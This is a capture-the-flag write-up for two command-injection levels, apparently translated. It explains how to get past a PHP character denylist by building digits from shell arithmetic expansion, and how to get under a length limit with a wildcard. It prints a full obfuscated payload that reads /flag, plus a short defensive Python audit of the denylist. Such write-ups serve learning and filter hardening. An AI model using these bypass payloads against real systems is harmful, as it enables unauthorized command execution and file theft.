
Level 13

Source code analysis

  • This level goes back to PHP
  • The key line is
    preg_match("/[A-Za-z0-9\"%*+,-.\/:;>?@[\]^`|]/", $cmd)
    
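  • All digits are banned, and since we are back in PHP, the previous level's bypass cannot be used
  • Compared with the previous level, though, the filter no longer blocks &, ~ and _
  • So there seems to be another way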
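Why the filter still leaves a way through, as an added example (not code from the original write-up): it lists the printable ASCII characters the denylist above does not match and checks that input built only from them can still carry shell syntax. `SHELL_SYNTAX`, `audit`, `ACTIONS` and `resolve` are illustrative names, and the allowlist at the end is an assumed mitigation, not the challenge's code.

```python
import re

# The level's denylist, copied from the preg_match() call above.
DENYLIST = re.compile(r'[A-Za-z0-9"%*+,-.\/:;>?@[\]^`|]')


def residual_alphabet() -> str:
    """Printable ASCII characters that the denylist does not match."""
    return "".join(c for c in map(chr, range(0x20, 0x7F)) if not DENYLIST.search(c))


# Shell constructs that need no letters or digits (illustrative list, an assumption).
SHELL_SYNTAX = {
    "$((": "arithmetic expansion",
    "${": "parameter expansion",
    "<<<": "here-string",
    "&&": "command list",
    "$'": "ANSI-C quoting",
}


def audit(cmd: str) -> dict:
    """Report whether the denylist accepts cmd and which shell constructs it carries."""
    return {
        "accepted_by_denylist": DENYLIST.search(cmd) is None,
        "shell_syntax": sorted(n for tok, n in SHELL_SYNTAX.items() if tok in cmd),
    }


# Allowlist alternative: the request only names an action, the server owns the argv.
ACTIONS = {"uptime": ["uptime"], "whoami": ["id", "-un"]}  # constructed examples


def resolve(action: str) -> list:
    """Return the fixed argv for a known action; anything else is rejected."""
    if action not in ACTIONS:
        raise ValueError("unknown action")
    return ACTIONS[action]


if __name__ == "__main__":
    print(repr(residual_alphabet()))
    # Sample inputs: the opening of this page's payload, and a plain command.
    for sample in ("__=$(())&&${!__}", "cat /flag"):
        print(sample, audit(sample))
```

The denylist rejects the plain command but accepts the letter-free input, which is why filtering characters in front of a shell is weaker than never handing request data to a shell at all.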

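Solution analysis

  • Use $(()) and ~ (bitwise NOT) to construct digits
  • Here is just one example, how to construct the digit 1; I can only marvel at how neatly it works out (view this on a computer, the formatting loads oddly on a phone; if that really does not work, see the original link)
    Assume here that a signed integer is only 1 bit
    $(())     $(())                      -> 0    (binary 0000)  (only one written out)
    ~$(())     ~$(())                    -> ~0   (binary ~0000) (only one written out)
    $((~$(())))$((~$(())))               -> -1   (binary 1111)  (only one written out)
    $(($((~$(())))$((~$(())))))          -> -2   (binary 1110)
    ~$(($((~$(())))$((~$(())))))         -> ~-2  (binary ~1110)
    $((~$(($((~$(())))$((~$(())))))))    -> 1    (binary 0001)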
    
    • Work out the rest yourself
      oct_list = [  # digits 0-7, used later to build the octal form
          '$(())',  # 0
          '$((~$(($((~$(())))$((~$(())))))))',  # 1
          '$((~$(($((~$(())))$((~$(())))$((~$(())))))))',  # 2
          '$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))))))',  # 3
          '$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))',  # 4
          '$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))',  # 5
          '$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))',  # 6
          '$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))',  # 7
      ]
      
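  • Using ${!#} to stand for bash does not work in this level's PHP environment, so the only option is to define a variable
    • First define a variable __ and assign it 0, i.e. __=0
      • Note the shell's naming rules here
      • A variable name must start with an underscore or an English letter and may contain underscores, letters and digits
      • So a single _ cannot be used as the variable name
  • Then use ${!__} in place of $0, i.e. the shell name
  • The variable definition and the command that reads the flag are joined with &&
  • The final payload is as follows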
    __=$(())&&${!__}<<<${!__}\<\<\<\$\'\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$(())\\$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\'
    

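Solution steps

  • This level again passes the parameter via GET, so URL encoding is needed again; because the payload now also contains = and &, for convenience I simply URL-encoded the whole thing. The final payload is ?cmd= followed by the fully URL-encoded form of the payload above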

Level 14

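Source code analysis

  • This level uses the strlen() function to check the command length
  • and only allows commands shorter than 7 characters to be executed

Solution analysis

  • You probably still remember the wildcards used in the earlier levels
  • Squeezing cat /flag into fewer than 7 characters should not be hard

Solution steps

  • The payload is as follows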
    ?1=cat%20/f*
    